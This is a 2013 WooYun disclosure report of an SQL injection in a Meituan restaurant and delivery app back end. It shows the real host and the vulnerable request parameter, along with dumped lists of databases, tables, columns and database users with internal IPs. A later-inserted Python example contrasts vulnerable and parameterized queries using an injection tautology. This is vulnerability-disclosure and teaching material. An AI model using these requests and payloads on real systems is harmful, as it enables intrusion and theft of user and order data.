
Vulnerability summary (followed by 24 users)

Defect ID: wooyun-2013-045362

Title: App Terminator 7#: SQL injection in the cloud back end of the 美团 (Meituan) foodie app affects multiple main-site databases

Vendor: 美团网 (Meituan)

Author: zzR

Submitted: 2013-12-09 10:12

Fixed: 2014-01-23 10:13

Published: 2014-01-23 10:13

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-12-09: details sent to the vendor, awaiting vendor handling
2013-12-09: vendor confirmed; details visible to the vendor only
2013-12-19: details disclosed to core white hats and domain experts
2013-12-29: details disclosed to regular white hats
2014-01-08: details disclosed to intern white hats
2014-01-23: details disclosed to the public

Brief description:

Last night I went out for hotpot. My wife said a group-buy deal would save us 20 yuan, so she happily pulled out the Meituan app, and I took the chance to have a look. The App series I had already wrapped up is back...

Detailed description:

Affected Meituan apps: 美团餐厅 (Meituan Restaurant) + 美团外卖 (Meituan Waimai) + ...
The request is as follows:

GET /woodpecker/poi/search?condition= HTTP/1.1
Host: xianfu.meituan.com
Proxy-Connection: keep-alive
Accept-Encoding: gzip
User-Agent: 美团餐厅 1.2 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: keep-alive
Cookie: 1=_from


The condition= parameter is injectable.
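As an added illustration (not code from the report or from Meituan), the following contrasts the string-concatenation pattern that makes a search parameter like condition= injectable with a parameterized query. It uses an in-memory sqlite3 database as a stand-in for the MySQL back end; the table name `poi_info` comes from the report's table list, while its columns and the sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows for a POI search; the column layout is assumed.
SAMPLE_POIS = [
    (1, "Haidilao Hotpot", "hotpot"),
    (2, "Xiabu Xiabu", "hotpot"),
    (3, "Yonghe King", "breakfast"),
]


def make_db():
    """Build an in-memory stand-in for the poi_info table (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE poi_info (id INTEGER, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO poi_info VALUES (?, ?, ?)", SAMPLE_POIS)
    return conn


def search_vulnerable(conn, condition):
    """Vulnerable pattern: the request parameter is spliced into the SQL text,
    so a quote inside `condition` terminates the string literal and whatever
    follows is parsed as SQL by the database."""
    sql = "SELECT id, name FROM poi_info WHERE name LIKE '%" + condition + "%'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, condition):
    """Hardened form: the value is bound as a parameter and is only ever
    treated as data, never as part of the SQL statement."""
    sql = "SELECT id, name FROM poi_info WHERE name LIKE ?"
    return conn.execute(sql, ("%" + condition + "%",)).fetchall()


def demo():
    """Run both variants on a normal search term and on a textbook tautology."""
    conn = make_db()
    benign = "Hotpot"
    crafted = "x' OR 1=1 --"  # classic tautology, shown only to expose the difference
    return {
        "vulnerable_benign": search_vulnerable(conn, benign),
        "vulnerable_crafted": search_vulnerable(conn, crafted),  # every row
        "param_benign": search_parameterized(conn, benign),
        "param_crafted": search_parameterized(conn, crafted),    # no row matches
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The report's enumeration of eleven databases and 183 database users through one app endpoint also shows the connecting account was far over-privileged; a per-application account restricted to its own schema would have contained the damage even with the injection present.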

Proof of vulnerability:

Current user and database:

[screenshot: 1.png]


Current database:

Database: woodpecker
[52 tables]
+-----------------------+
| accesstoken |
| activemq_info |
| app |
| app_release_info |
| banner |
| canting_user |
| customer_requirements |
| desk_class |
| desk_order |
| desk_order_window |
| dining_table |
| filter_user |
| food |
| food_choose_feature |
| food_feature_count |
| food_material |
| food_offer |
| food_order |
| food_practice |
| food_practice_value |
| food_relation |
| food_set |
| food_tag |
| food_tag_value |
| food_taste |
| food_unit |
| log_info |
| meituan_outer_food |
| meituan_outer_order |
| meituan_outer_poi |
| order_code |
| order_offer |
| ordered_food |
| ordered_reward |
| outer_system |
| pad_info |
| poi_env |
| poi_info |
| poi_member_stat |
| poi_reward |
| poi_score_rules |
| printer |
| return_food_reason |
| score_event |
| special_food |
| statistics_trend |
| tmp |
| tmp_order_code |
| user_feedback |
| user_loyalty |
| wait_queue |
| waiter |
+-----------------------+


Cross-database: 美团餐厅 (Meituan Restaurant)

Database: xianfu
[36 tables]
+--------------------------+
| accesstoken |
| activity_coupon |
| card_manager_coupon_code |
| cardmanager_log |
| channel |
| client_behaviour |
| client_event |
| client_register |
| client_version |
| coupon |
| coupon_account |
| coupon_account_cookie |
| coupon_batchsend |
| coupon_channel |
| coupon_code |
| coupon_consume |
| coupon_customer |
| coupon_deal |
| coupon_poi |
| couponverify_log |
| customer |
| customer_action_h |
| customer_behaviour |
| customer_demo |
| customer_meituan |
| customer_poi |
| customer_relation |
| customer_weixin |
| customer_weixin_aptcha |
| fastverify_log |
| poi_sync |
| share_group |
| share_group_c |
| super_coupon_info |
| super_coupon_login |
| white_list |
+--------------------------+
Database: xianfu
Table: coupon
[17 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| alertsms | varchar(1024) |
| brandname | varchar(255) |
| content | varchar(1024) |
| couponpic | varchar(255) |
| ctime | int(11) |
| duration | int(4) |
| etime | int(11) |
| event_expiretime | int(11) |
| event_type | int(5) |
| id | int(11) |
| sms | varchar(1024) |
| status | int(3) |
| stime | int(11) |
| title | varchar(1024) |
| type | int(2) |
| utime | int(11) |
| warn | int(11) |
+------------------+---------------+


美团外卖 (Meituan Waimai) database:

Database: waimai
[25 tables]
+----------------------------+
| wm_address |
| wm_app_channel |
| wm_app_version |
| wm_channel |
| wm_discount |
| wm_food |
| wm_food_import |
| wm_food_tag |
| wm_gao_poi_info |
| wm_log |
| wm_order |
| wm_order_detail |
| wm_order_detail_history |
| wm_order_history |
| wm_order_status_utimestamp |
| wm_poi |
| wm_poi_match |
| wm_poi_tag |
| wm_poi_tag_dic |
| wm_poi_utimestamp |
| wm_push_client |
| wm_tradearea_point |
| wm_user |
| wm_user_dialogue |
| wm_user_topic |
+----------------------------+


I won't bother explaining what the individual columns are.
Finally, the dbs:

available databases [11]:
[*] biz_auth
[*] information_schema
[*] mysql
[*] pangolin
[*] performance_schema
[*] test
[*] test_waimai
[*] waimai
[*] woodpecker
[*] xfbase
[*] xianfu


See that pangolin? Better go check whether your underwear is still intact.
users: all kinds of admin and root

database management system users [183]:
[*] 'admin'@'10.64.10.104'
[*] 'admin'@'localhost'
[*] 'meituan_in'@'10.%'
[*] 'monitor'@'10.%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'skrepl'@'10.%'
[*] 'superadmin'@'10.64.10.104'
[*] 'xianfu_waimai'@'10.%'

Fix suggestion:

I've already done your PR for you; what more do you want -0-

Copyright notice: when reposting, please credit the source: zzR@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed at: 2013-12-09 10:28

Vendor reply:

Thank you for your attention to Meituan; we are handling it.

Latest status:

None yet